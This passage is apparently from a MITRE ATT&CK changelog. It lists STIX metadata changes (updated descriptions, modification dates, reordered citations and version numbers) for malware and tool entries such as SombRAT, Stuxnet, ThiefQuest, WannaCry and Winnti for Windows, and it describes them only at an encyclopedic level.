| [Sibot](https://attack.mitre.org/software/S0589) is dual-purpose malware written in VBScript designed to achieve persistence on a compromised system as well as download and execute additional payloads. Microsoft discovered three [Sibot](https://attack.mitre.org/software/S0589) variants in early 2021 during its investigation of [APT29](https://attack.mitre.org/groups/G0016) and the SolarWinds cyber intrusion campaign.(Citation: MSTIC NOBELIUM Mar 2021) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-04-20 22:30:19.071000+00:00 | 2022-10-18 23:33:55.403000+00:00 |
| Old Description | New Description |
|---|---|
| [SombRAT](https://attack.mitre.org/software/S0615) is a modular backdoor written in C++ that has been in use since at least 2019. [SombRAT](https://attack.mitre.org/software/S0615) has been used to download and execute malicious payloads, including [FIVEHANDS](https://attack.mitre.org/software/S0618) ransomware.(Citation: BlackBerry CostaRicto November 2020)(Citation: FireEye FiveHands April 2021)(Citation: CISA AR21-126A FIVEHANDS May 2021) | [SombRAT](https://attack.mitre.org/software/S0615) is a modular backdoor written in C++ that has been used since at least 2019 to download and execute malicious payloads, including [FIVEHANDS](https://attack.mitre.org/software/S0618) ransomware.(Citation: BlackBerry CostaRicto November 2020)(Citation: FireEye FiveHands April 2021)(Citation: CISA AR21-126A FIVEHANDS May 2021) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-15 23:39:53.415000+00:00 | 2022-10-05 16:33:54.170000+00:00 |
| description | [SombRAT](https://attack.mitre.org/software/S0615) is a modular backdoor written in C++ that has been in use since at least 2019. [SombRAT](https://attack.mitre.org/software/S0615) has been used to download and execute malicious payloads, including [FIVEHANDS](https://attack.mitre.org/software/S0618) ransomware.(Citation: BlackBerry CostaRicto November 2020)(Citation: FireEye FiveHands April 2021)(Citation: CISA AR21-126A FIVEHANDS May 2021) | [SombRAT](https://attack.mitre.org/software/S0615) is a modular backdoor written in C++ that has been used since at least 2019 to download and execute malicious payloads, including [FIVEHANDS](https://attack.mitre.org/software/S0618) ransomware.(Citation: BlackBerry CostaRicto November 2020)(Citation: FireEye FiveHands April 2021)(Citation: CISA AR21-126A FIVEHANDS May 2021) |
| external_references[1]['source_name'] | BlackBerry CostaRicto November 2020 | CISA AR21-126A FIVEHANDS May 2021 |
| external_references[1]['description'] | The BlackBerry Research and Intelligence Team. (2020, November 12). The CostaRicto Campaign: Cyber-Espionage Outsourced. Retrieved May 24, 2021. | CISA. (2021, May 6). Analysis Report (AR21-126A) FiveHands Ransomware. Retrieved June 7, 2021. |
| external_references[1]['url'] | https://blogs.blackberry.com/en/2020/11/the-costaricto-campaign-cyber-espionage-outsourced | https://us-cert.cisa.gov/ncas/analysis-reports/ar21-126a |
| external_references[3]['source_name'] | CISA AR21-126A FIVEHANDS May 2021 | BlackBerry CostaRicto November 2020 |
| external_references[3]['description'] | CISA. (2021, May 6). Analysis Report (AR21-126A) FiveHands Ransomware. Retrieved June 7, 2021. | The BlackBerry Research and Intelligence Team. (2020, November 12). The CostaRicto Campaign: Cyber-Espionage Outsourced. Retrieved May 24, 2021. |
| external_references[3]['url'] | https://us-cert.cisa.gov/ncas/analysis-reports/ar21-126a | https://blogs.blackberry.com/en/2020/11/the-costaricto-campaign-cyber-espionage-outsourced |
| x_mitre_version | 1.0 | 1.2 |
| Description |
|---|
| [Stuxnet](https://attack.mitre.org/software/S0603) was the first publicly reported piece of malware to specifically target industrial control systems devices. [Stuxnet](https://attack.mitre.org/software/S0603) is a large and complex piece of malware that utilized multiple different behaviors including multiple zero-day vulnerabilities, a sophisticated Windows rootkit, and network infection routines.(Citation: Symantec W.32 Stuxnet Dossier)(Citation: CISA ICS Advisory ICSA-10-272-01)(Citation: ESET Stuxnet Under the Microscope)(Citation: Langer Stuxnet) [Stuxnet](https://attack.mitre.org/software/S0603) was discovered in 2010, with some components being used as early as November 2008.(Citation: Symantec W.32 Stuxnet Dossier) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack', 'ics-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-12 21:50:58.905000+00:00 | 2022-10-20 20:31:32.664000+00:00 |
| external_references[2]['source_name'] | Symantec W.32 Stuxnet Dossier | CISA ICS Advisory ICSA-10-272-01 |
| external_references[2]['description'] | Nicolas Falliere, Liam O. Murchu, Eric Chien. (2011, February). W32.Stuxnet Dossier. Retrieved December 7, 2020. | CISA. (2010, September 10). ICS Advisory (ICSA-10-272-01). Retrieved December 7, 2020. |
| external_references[2]['url'] | https://www.wired.com/images_blogs/threatlevel/2010/11/w32_stuxnet_dossier.pdf | https://us-cert.cisa.gov/ics/advisories/ICSA-10-272-01 |
| external_references[3]['source_name'] | CISA ICS Advisory ICSA-10-272-01 | ESET Stuxnet Under the Microscope |
| external_references[3]['description'] | CISA. (2010, September 10). ICS Advisory (ICSA-10-272-01). Retrieved December 7, 2020. | Matrosov, A., Rodionov, E., Harley, D., Malcho, J.. (n.d.). Stuxnet Under the Microscope. Retrieved December 7, 2020. |
| external_references[3]['url'] | https://us-cert.cisa.gov/ics/advisories/ICSA-10-272-01 | https://www.esetnod32.ru/company/viruslab/analytics/doc/Stuxnet_Under_the_Microscope.pdf |
| external_references[4]['source_name'] | ESET Stuxnet Under the Microscope | Symantec W.32 Stuxnet Dossier |
| external_references[4]['description'] | Matrosov, A., Rodionov, E., Harley, D., Malcho, J.. (n.d.). Stuxnet Under the Microscope. Retrieved December 7, 2020. | Nicolas Falliere, Liam O. Murchu, Eric Chien. (2011, February). W32.Stuxnet Dossier. Retrieved December 7, 2020. |
| external_references[4]['url'] | https://www.esetnod32.ru/company/viruslab/analytics/doc/Stuxnet_Under_the_Microscope.pdf | https://www.wired.com/images_blogs/threatlevel/2010/11/w32_stuxnet_dossier.pdf |
| x_mitre_version | 1.0 | 1.2 |
| Description |
|---|
| [Systeminfo](https://attack.mitre.org/software/S0096) is a Windows utility that can be used to gather detailed information about a computer. (Citation: TechNet Systeminfo) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_platforms | ['Windows'] |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2018-10-17 00:14:20.652000+00:00 | 2022-10-12 21:29:48.567000+00:00 |
| x_mitre_version | 1.0 | 1.1 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_aliases | systeminfo.exe |
| Description |
|---|
| [TEXTMATE](https://attack.mitre.org/software/S0146) is a second-stage PowerShell backdoor that is memory-resident. It was observed being used along with [POWERSOURCE](https://attack.mitre.org/software/S0145) in February 2017. (Citation: FireEye FIN7 March 2017) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-03-30 18:19:25.928000+00:00 | 2022-07-20 20:06:44.708000+00:00 |
| external_references[3]['source_name'] | FireEye FIN7 March 2017 | Cisco DNSMessenger March 2017 |
| external_references[3]['description'] | Miller, S., et al. (2017, March 7). FIN7 Spear Phishing Campaign Targets Personnel Involved in SEC Filings. Retrieved March 8, 2017. | Brumaghin, E. and Grady, C.. (2017, March 2). Covert Channels and Poor Decisions: The Tale of DNSMessenger. Retrieved March 8, 2017. |
| external_references[3]['url'] | https://www.fireeye.com/blog/threat-research/2017/03/fin7_spear_phishing.html | http://blog.talosintelligence.com/2017/03/dnsmessenger.html |
| external_references[4]['source_name'] | Cisco DNSMessenger March 2017 | FireEye FIN7 March 2017 |
| external_references[4]['description'] | Brumaghin, E. and Grady, C.. (2017, March 2). Covert Channels and Poor Decisions: The Tale of DNSMessenger. Retrieved March 8, 2017. | Miller, S., et al. (2017, March 7). FIN7 Spear Phishing Campaign Targets Personnel Involved in SEC Filings. Retrieved March 8, 2017. |
| external_references[4]['url'] | http://blog.talosintelligence.com/2017/03/dnsmessenger.html | https://web.archive.org/web/20180808125108/https:/www.fireeye.com/blog/threat-research/2017/03/fin7_spear_phishing.html |
| Description |
|---|
| [TSCookie](https://attack.mitre.org/software/S0436) is a remote access tool (RAT) that has been used by [BlackTech](https://attack.mitre.org/groups/G0098) in campaigns against Japanese targets.(Citation: JPCert TSCookie March 2018)(Citation: JPCert BlackTech Malware September 2019). [TSCookie](https://attack.mitre.org/software/S0436) has been referred to as [PLEAD](https://attack.mitre.org/software/S0435) though more recent reporting indicates a separation between the two.(Citation: JPCert PLEAD Downloader June 2018)(Citation: JPCert BlackTech Malware September 2019) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-07-07 14:05:07.519000+00:00 | 2022-04-15 11:32:25.171000+00:00 |
| external_references[1]['source_name'] | JPCert TSCookie March 2018 | JPCert PLEAD Downloader June 2018 |
| external_references[1]['description'] | Tomonaga, S.. (2018, March 6). Malware “TSCookie”. Retrieved May 6, 2020. | Tomonaga, S. (2018, June 8). PLEAD Downloader Used by BlackTech. Retrieved May 6, 2020. |
| external_references[2]['source_name'] | JPCert BlackTech Malware September 2019 | JPCert TSCookie March 2018 |
| external_references[2]['description'] | Tomonaga, S.. (2019, September 18). Malware Used by BlackTech after Network Intrusion. Retrieved May 6, 2020. | Tomonaga, S. (2018, March 6). Malware “TSCookie”. Retrieved May 6, 2020. |
| external_references[2]['url'] | https://blogs.jpcert.or.jp/en/2019/09/tscookie-loader.html | https://blogs.jpcert.or.jp/en/2018/03/malware-tscooki-7aa0.html |
| external_references[3]['source_name'] | JPCert PLEAD Downloader June 2018 | JPCert BlackTech Malware September 2019 |
| external_references[3]['description'] | Tomonaga, S.. (2018, June 8). PLEAD Downloader Used by BlackTech. Retrieved May 6, 2020. | Tomonaga, S.. (2019, September 18). Malware Used by BlackTech after Network Intrusion. Retrieved May 6, 2020. |
| external_references[3]['url'] | https://blogs.jpcert.or.jp/en/2018/03/malware-tscooki-7aa0.html | https://blogs.jpcert.or.jp/en/2019/09/tscookie-loader.html |
| Description |
|---|
| The [Tasklist](https://attack.mitre.org/software/S0057) utility displays a list of applications and services with their Process IDs (PID) for all tasks running on either a local or a remote computer. It is packaged with Windows operating systems and can be executed from the command-line interface. (Citation: Microsoft Tasklist) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_platforms | ['Windows'] |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2018-10-17 00:14:20.652000+00:00 | 2022-10-12 21:30:23.536000+00:00 |
| x_mitre_version | 1.0 | 1.1 |
| Description |
|---|
| [ThiefQuest](https://attack.mitre.org/software/S0595) is a virus, data stealer, and wiper that presents itself as ransomware targeting macOS systems. [ThiefQuest](https://attack.mitre.org/software/S0595) was first seen in 2020 distributed via trojanized pirated versions of popular macOS software on Russian forums sharing torrent links.(Citation: Reed thiefquest fake ransom) Even though [ThiefQuest](https://attack.mitre.org/software/S0595) presents itself as ransomware, since the dynamically generated encryption key is never sent to the attacker it may be more appropriately thought of as a form of wiper malware.(Citation: wardle evilquest partii)(Citation: reed thiefquest ransomware analysis) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-05 01:47:00.880000+00:00 | 2022-04-16 15:01:37.957000+00:00 |
| external_references[2]['source_name'] | MacRansom.K | EvilQuest |
| external_references[2]['description'] | (Citation: SentinelOne EvilQuest Ransomware Spyware 2020) | (Citation: Reed thiefquest fake ransom) |
| external_references[3]['source_name'] | EvilQuest | MacRansom.K |
| external_references[3]['description'] | (Citation: Reed thiefquest fake ransom) | (Citation: SentinelOne EvilQuest Ransomware Spyware 2020) |
| external_references[4]['source_name'] | Reed thiefquest fake ransom | wardle evilquest partii |
| external_references[4]['description'] | Thomas Reed. (2020, July 7). Mac ThiefQuest malware may not be ransomware after all. Retrieved March 18, 2021. | Patrick Wardle. (2020, July 3). OSX.EvilQuest Uncovered part ii: insidious capabilities. Retrieved March 21, 2021. |
| external_references[4]['url'] | https://blog.malwarebytes.com/detections/osx-thiefquest/ | https://objective-see.com/blog/blog_0x60.html |
| external_references[5]['source_name'] | wardle evilquest partii | SentinelOne EvilQuest Ransomware Spyware 2020 |
| external_references[5]['description'] | Patrick Wardle. (2020, July 3). OSX.EvilQuest Uncovered part ii: insidious capabilities. Retrieved March 21, 2021. | Phil Stokes. (2020, July 8). “EvilQuest” Rolls Ransomware, Spyware & Data Theft Into One. Retrieved April 1, 2021. |
| external_references[5]['url'] | https://objective-see.com/blog/blog_0x60.html | https://www.sentinelone.com/blog/evilquest-a-new-macos-malware-rolls-ransomware-spyware-and-data-theft-into-one/ |
| external_references[6]['source_name'] | reed thiefquest ransomware analysis | Reed thiefquest fake ransom |
| external_references[6]['description'] | Thomas Reed. (2020, July 7). Mac ThiefQuest malware may not be ransomware after all. Retrieved March 22, 2021. | Thomas Reed. (2020, July 7). Mac ThiefQuest malware may not be ransomware after all. Retrieved March 18, 2021. |
| external_references[6]['url'] | https://blog.malwarebytes.com/mac/2020/07/mac-thiefquest-malware-may-not-be-ransomware-after-all/ | https://blog.malwarebytes.com/detections/osx-thiefquest/ |
| external_references[7]['source_name'] | SentinelOne EvilQuest Ransomware Spyware 2020 | reed thiefquest ransomware analysis |
| external_references[7]['description'] | Phil Stokes. (2020, July 8). “EvilQuest” Rolls Ransomware, Spyware & Data Theft Into One. Retrieved April 1, 2021. | Thomas Reed. (2020, July 7). Mac ThiefQuest malware may not be ransomware after all. Retrieved March 22, 2021. |
| external_references[7]['url'] | https://www.sentinelone.com/blog/evilquest-a-new-macos-malware-rolls-ransomware-spyware-and-data-theft-into-one/ | https://blog.malwarebytes.com/mac/2020/07/mac-thiefquest-malware-may-not-be-ransomware-after-all/ |
| x_mitre_version | 1.1 | 1.2 |
| Description |
|---|
| [TinyZBot](https://attack.mitre.org/software/S0004) is a bot written in C# that was developed by [Cleaver](https://attack.mitre.org/groups/G0003). (Citation: Cylance Cleaver) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-04-21 16:41:34.655000+00:00 | 2022-07-22 18:37:22.180000+00:00 |
| Description |
|---|
| [Tor](https://attack.mitre.org/software/S0183) is a software suite and network that provides increased anonymity on the Internet. It creates a multi-hop proxy network and utilizes multilayer encryption to protect both the message and routing information. [Tor](https://attack.mitre.org/software/S0183) utilizes "Onion Routing," in which messages are encrypted with multiple layers of encryption; at each step in the proxy network, the topmost layer is decrypted and the contents forwarded on to the next node until it reaches its destination. (Citation: Dingledine Tor The Second-Generation Onion Router) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-05-13 22:59:15.727000+00:00 | 2022-10-05 16:37:49.999000+00:00 |
| x_mitre_version | 1.1 | 1.2 |
| Old Description | New Description |
|---|---|
| [Trojan.Karagany](https://attack.mitre.org/software/S0094) is a modular remote access tool used for recon and linked to [Dragonfly](https://attack.mitre.org/groups/G0035) and [Dragonfly 2.0](https://attack.mitre.org/groups/G0074). The source code for [Trojan.Karagany](https://attack.mitre.org/software/S0094) originated from Dream Loader malware which was leaked in 2010 and sold on underground forums. (Citation: Symantec Dragonfly)(Citation: Secureworks Karagany July 2019)(Citation: Dragos DYMALLOY ) | [Trojan.Karagany](https://attack.mitre.org/software/S0094) is a modular remote access tool used for recon and linked to [Dragonfly](https://attack.mitre.org/groups/G0035). The source code for [Trojan.Karagany](https://attack.mitre.org/software/S0094) originated from Dream Loader malware which was leaked in 2010 and sold on underground forums. (Citation: Symantec Dragonfly)(Citation: Secureworks Karagany July 2019)(Citation: Dragos DYMALLOY ) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-10-14 22:38:11.328000+00:00 | 2022-04-19 14:57:44.862000+00:00 |
| description | [Trojan.Karagany](https://attack.mitre.org/software/S0094) is a modular remote access tool used for recon and linked to [Dragonfly](https://attack.mitre.org/groups/G0035) and [Dragonfly 2.0](https://attack.mitre.org/groups/G0074). The source code for [Trojan.Karagany](https://attack.mitre.org/software/S0094) originated from Dream Loader malware which was leaked in 2010 and sold on underground forums. (Citation: Symantec Dragonfly)(Citation: Secureworks Karagany July 2019)(Citation: Dragos DYMALLOY ) | [Trojan.Karagany](https://attack.mitre.org/software/S0094) is a modular remote access tool used for recon and linked to [Dragonfly](https://attack.mitre.org/groups/G0035). The source code for [Trojan.Karagany](https://attack.mitre.org/software/S0094) originated from Dream Loader malware which was leaked in 2010 and sold on underground forums. (Citation: Symantec Dragonfly)(Citation: Secureworks Karagany July 2019)(Citation: Dragos DYMALLOY ) |
| external_references[3]['source_name'] | Symantec Dragonfly | Dragos DYMALLOY |
| external_references[3]['description'] | Symantec Security Response. (2014, July 7). Dragonfly: Cyberespionage Attacks Against Energy Suppliers. Retrieved April 8, 2016. | Dragos. (n.d.). DYMALLOY. Retrieved August 20, 2020. |
| external_references[3]['url'] | http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/Dragonfly_Threat_Against_Western_Energy_Suppliers.pdf | https://www.dragos.com/threat/dymalloy/ |
| external_references[5]['source_name'] | Dragos DYMALLOY | Symantec Dragonfly |
| external_references[5]['description'] | Dragos. (n.d.). DYMALLOY. Retrieved August 20, 2020. | Symantec Security Response. (2014, June 30). Dragonfly: Cyberespionage Attacks Against Energy Suppliers. Retrieved April 8, 2016. |
| external_references[5]['url'] | https://www.dragos.com/threat/dymalloy/ | https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=7382dce7-0260-4782-84cc-890971ed3f17&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments |
| x_mitre_version | 2.0 | 3.0 |
| Old Description | New Description |
|---|---|
| [USBStealer](https://attack.mitre.org/software/S0136) is malware that has used by [APT28](https://attack.mitre.org/groups/G0007) since at least 2005 to extract information from air-gapped networks. It does not have the capability to communicate over the Internet and has been used in conjunction with [ADVSTORESHELL](https://attack.mitre.org/software/S0045). (Citation: ESET Sednit USBStealer 2014) (Citation: Kaspersky Sofacy) | [USBStealer](https://attack.mitre.org/software/S0136) is malware that has been used by [APT28](https://attack.mitre.org/groups/G0007) since at least 2005 to extract information from air-gapped networks. It does not have the capability to communicate over the Internet and has been used in conjunction with [ADVSTORESHELL](https://attack.mitre.org/software/S0045). (Citation: ESET Sednit USBStealer 2014) (Citation: Kaspersky Sofacy) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-03-18 16:11:07.955000+00:00 | 2022-04-19 22:53:27.639000+00:00 |
| description | [USBStealer](https://attack.mitre.org/software/S0136) is malware that has used by [APT28](https://attack.mitre.org/groups/G0007) since at least 2005 to extract information from air-gapped networks. It does not have the capability to communicate over the Internet and has been used in conjunction with [ADVSTORESHELL](https://attack.mitre.org/software/S0045). (Citation: ESET Sednit USBStealer 2014) (Citation: Kaspersky Sofacy) | [USBStealer](https://attack.mitre.org/software/S0136) is malware that has been used by [APT28](https://attack.mitre.org/groups/G0007) since at least 2005 to extract information from air-gapped networks. It does not have the capability to communicate over the Internet and has been used in conjunction with [ADVSTORESHELL](https://attack.mitre.org/software/S0045). (Citation: ESET Sednit USBStealer 2014) (Citation: Kaspersky Sofacy) |
| x_mitre_version | 1.1 | 1.2 |
| Description |
|---|
| [WannaCry](https://attack.mitre.org/software/S0366) is ransomware that was first seen in a global attack during May 2017, which affected more than 150 countries. It contains worm-like features to spread itself across a computer network using the SMBv1 exploit EternalBlue.(Citation: LogRhythm WannaCry)(Citation: US-CERT WannaCry 2017)(Citation: Washington Post WannaCry 2017)(Citation: FireEye WannaCry 2017) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_domains | ['enterprise-attack', 'ics-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-05-13 22:59:51.283000+00:00 | 2022-04-25 14:00:00.188000+00:00 |
| Description |
|---|
| [Waterbear](https://attack.mitre.org/software/S0579) is modular malware attributed to [BlackTech](https://attack.mitre.org/groups/G0098) that has been used primarily for lateral movement, decrypting, and triggering payloads and is capable of hiding network behaviors.(Citation: Trend Micro Waterbear December 2019) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-04-24 20:33:05.198000+00:00 | 2022-03-25 16:46:35.932000+00:00 |
| x_mitre_version | 1.0 | 1.1 |
| Description |
|---|
| [Wevtutil](https://attack.mitre.org/software/S0645) is a Windows command-line utility that enables administrators to retrieve information about event logs and publishers.(Citation: Wevtutil Microsoft Documentation) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-09-21 18:03:13.205000+00:00 | 2022-10-13 17:45:16.377000+00:00 |
| x_mitre_version | 1.0 | 1.1 |
| Description |
|---|
| [WindTail](https://attack.mitre.org/software/S0466) is a macOS surveillance implant used by [Windshift](https://attack.mitre.org/groups/G0112). [WindTail](https://attack.mitre.org/software/S0466) shares code similarities with Hack Back aka KitM OSX.(Citation: SANS Windshift August 2018)(Citation: objective-see windtail1 dec 2018)(Citation: objective-see windtail2 jan 2019) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-15 06:31:19.173000+00:00 | 2022-04-20 22:03:11.833000+00:00 |
| Old Description | New Description |
|---|---|
| [Winnti for Windows](https://attack.mitre.org/software/S0141) is a Trojan that has been used by multiple groups to carry out intrusions in varied regions from at least 2010 to 2016. One of the groups using this malware is referred to by the same name, [Winnti Group](https://attack.mitre.org/groups/G0044); however, reporting indicates a second distinct group, [Axiom](https://attack.mitre.org/groups/G0001), also uses the malware. (Citation: Kaspersky Winnti April 2013) (Citation: Microsoft Winnti Jan 2017) (Citation: Novetta Winnti April 2015) The Linux variant is tracked separately under [Winnti for Linux](https://attack.mitre.org/software/S0430).(Citation: Chronicle Winnti for Linux May 2019) | [Winnti for Windows](https://attack.mitre.org/software/S0141) is a modular remote access Trojan (RAT) that has been used likely by multiple groups to carry out intrusions in various regions since at least 2010, including by one group referred to as the same name, [Winnti Group](https://attack.mitre.org/groups/G0044).(Citation: Kaspersky Winnti April 2013)(Citation: Microsoft Winnti Jan 2017)(Citation: Novetta Winnti April 2015)(Citation: 401 TRG Winnti Umbrella May 2018). The Linux variant is tracked separately under [Winnti for Linux](https://attack.mitre.org/software/S0430).(Citation: Chronicle Winnti for Linux May 2019) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-05-04 12:29:49.081000+00:00 | 2022-04-15 16:38:19.439000+00:00 |
| description | [Winnti for Windows](https://attack.mitre.org/software/S0141) is a Trojan that has been used by multiple groups to carry out intrusions in varied regions from at least 2010 to 2016. One of the groups using this malware is referred to by the same name, [Winnti Group](https://attack.mitre.org/groups/G0044); however, reporting indicates a second distinct group, [Axiom](https://attack.mitre.org/groups/G0001), also uses the malware. (Citation: Kaspersky Winnti April 2013) (Citation: Microsoft Winnti Jan 2017) (Citation: Novetta Winnti April 2015) The Linux variant is tracked separately under [Winnti for Linux](https://attack.mitre.org/software/S0430).(Citation: Chronicle Winnti for Linux May 2019) | [Winnti for Windows](https://attack.mitre.org/software/S0141) is a modular remote access Trojan (RAT) that has been used likely by multiple groups to carry out intrusions in various regions since at least 2010, including by one group referred to as the same name, [Winnti Group](https://attack.mitre.org/groups/G0044).(Citation: Kaspersky Winnti April 2013)(Citation: Microsoft Winnti Jan 2017)(Citation: Novetta Winnti April 2015)(Citation: 401 TRG Winnti Umbrella May 2018). The Linux variant is tracked separately under [Winnti for Linux](https://attack.mitre.org/software/S0430).(Citation: Chronicle Winnti for Linux May 2019) |
| external_references[1]['source_name'] | Kaspersky Winnti April 2013 | Microsoft Winnti Jan 2017 |
| external_references[1]['description'] | Kaspersky Lab's Global Research and Analysis Team. (2013, April 11). Winnti. More than just a game. Retrieved February 8, 2017. | Cap, P., et al. (2017, January 25). Detecting threat actors in recent German industrial attacks with Windows Defender ATP. Retrieved February 8, 2017. |
| external_references[1]['url'] | https://securelist.com/winnti-more-than-just-a-game/37029/ | https://blogs.technet.microsoft.com/mmpc/2017/01/25/detecting-threat-actors-in-recent-german-industrial-attacks-with-windows-defender-atp/ |
| external_references[2]['source_name'] | Microsoft Winnti Jan 2017 | Chronicle Winnti for Linux May 2019 |
| external_references[2]['description'] | Cap, P., et al. (2017, January 25). Detecting threat actors in recent German industrial attacks with Windows Defender ATP. Retrieved February 8, 2017. | Chronicle Blog. (2019, May 15). Winnti: More than just Windows and Gates. Retrieved April 29, 2020. |
| external_references[2]['url'] | https://blogs.technet.microsoft.com/mmpc/2017/01/25/detecting-threat-actors-in-recent-german-industrial-attacks-with-windows-defender-atp/ | https://medium.com/chronicle-blog/winnti-more-than-just-windows-and-gates-e4f03436031a |
| external_references[3]['source_name'] | Novetta Winnti April 2015 | 401 TRG Winnti Umbrella May 2018 |
| external_references[3]['description'] | Novetta Threat Research Group. (2015, April 7). Winnti Analysis. Retrieved February 8, 2017. | Hegel, T. (2018, May 3). Burning Umbrella: An Intelligence Report on the Winnti Umbrella and Associated State-Sponsored Attackers. Retrieved July 8, 2018. |
| external_references[3]['url'] | http://www.novetta.com/wp-content/uploads/2015/04/novetta_winntianalysis.pdf | https://401trg.github.io/pages/burning-umbrella.html |
| external_references[4]['source_name'] | Chronicle Winnti for Linux May 2019 | Kaspersky Winnti April 2013 |
| external_references[4]['description'] | Chronicle Blog. (2019, May 15). Winnti: More than just Windows and Gates. Retrieved April 29, 2020. | Kaspersky Lab's Global Research and Analysis Team. (2013, April 11). Winnti. More than just a game. Retrieved February 8, 2017. |
| external_references[4]['url'] | https://medium.com/chronicle-blog/winnti-more-than-just-windows-and-gates-e4f03436031a | https://securelist.com/winnti-more-than-just-a-game/37029/ |
| x_mitre_version | 2.0 | 3.0 |
| STIX Field | Old value | New value |
|---|---|---|
